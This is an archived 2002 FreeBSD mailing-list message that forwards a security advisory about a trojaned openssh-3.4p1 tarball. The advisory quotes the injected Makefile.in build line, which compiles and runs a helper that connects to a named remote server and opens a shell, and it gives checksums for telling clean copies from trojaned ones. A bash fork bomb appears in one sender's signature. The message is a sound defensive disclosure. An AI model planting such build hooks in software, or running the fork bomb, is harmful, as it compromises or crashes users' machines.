Date: Sun, 04 Aug 2002 14:07:09 -0700 From: Karl Agee <kdagee@attglobal.net> To: FreeBSD-Questions@FreeBSD.ORG, freebsd-current@freebsd.org Subject: Fwd: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz distribution recently trojaned] !!!! Message-ID: <5.1.0.14.0.20020804140610.040fcd10@pop1.attglobal.net>
next in thread | raw e-mail | index | archive | help
FYI....from my Linux User Group maillist. --karl >X-Authentication-Warning: quince.tricity.wsu.edu: majordomo set sender to >owner-3clug@www.3clug.org using -f >Date: Thu, 1 Aug 2002 13:20:48 -0700 >From: Ed <ekg@tricity.wsu.edu> >To: 3clug@3clug.org >Subject: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz >distribution recently trojaned] !!!! >Mail-Followup-To: 3clug@3clug.org >User-Agent: Mutt/1.2.5.1i >Sender: owner-3clug@quince.tricity.wsu.edu > > >if you didn't know this already, some copies of the source distribution >of openssh are *trojaned*! the _untrojaned_ version has this md5 sum: >459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to >check it). the trojan horse connects to a computer in australia and >opens a shell on the local machine. > > Ed > >----- Forwarded message from Mikael Olsson <mikael.olsson@clavister.com> ----- > >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq-help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Date: Thu, 01 Aug 2002 13:20:47 +0200 >From: Mikael Olsson <mikael.olsson@clavister.com> >Organization: Clavister AB >To: bugtraq@securityfocus.com >Subject: openssh-3.4p1.tar.gz distribution recently trojaned >X-MailScanner: Found to be clean > > >From >http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security > >----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> ----- > >Date: Thu, 1 Aug 2002 16:55:51 +1000 >From: Edwin Groothuis <edwin@mavetju.org> >To: incidents@securityfocus.com >Subject: openssh-3.4p1.tar.gz trojaned > >Greetings, > >Just want to inform you that the OpenSSH package op ftp.openbsd.org >(and probably all its mirrors now) it trojaned: > > ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz > >The OpenBSD people have been informed about it (via email to >deraadt@openbsd.org and via irc.openprojects.org/#openbsd) > > >The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: > all: libopenbsd-compat.a >+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh >./bf-test.out & > >bf-test.c[1] is nothing more than a wrapper which generates a >shell-script[2] which compiles itself and tries to connect to an >server running on 203.62.158.32:6667 (web.snsonline.net). > >[1] http://www.mavetju.org/~edwin/bf-test.c >[2] http://www.mavetju.org/~edwin/bf-output.sh > >This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD >ports system: > MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 > >This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: > MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 > >Edwin > >-- >Edwin Groothuis | Personal website: http://www.MavEtJu.org >edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php >bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ > >----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-current" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?5.1.0.14.0.20020804140610.040fcd10>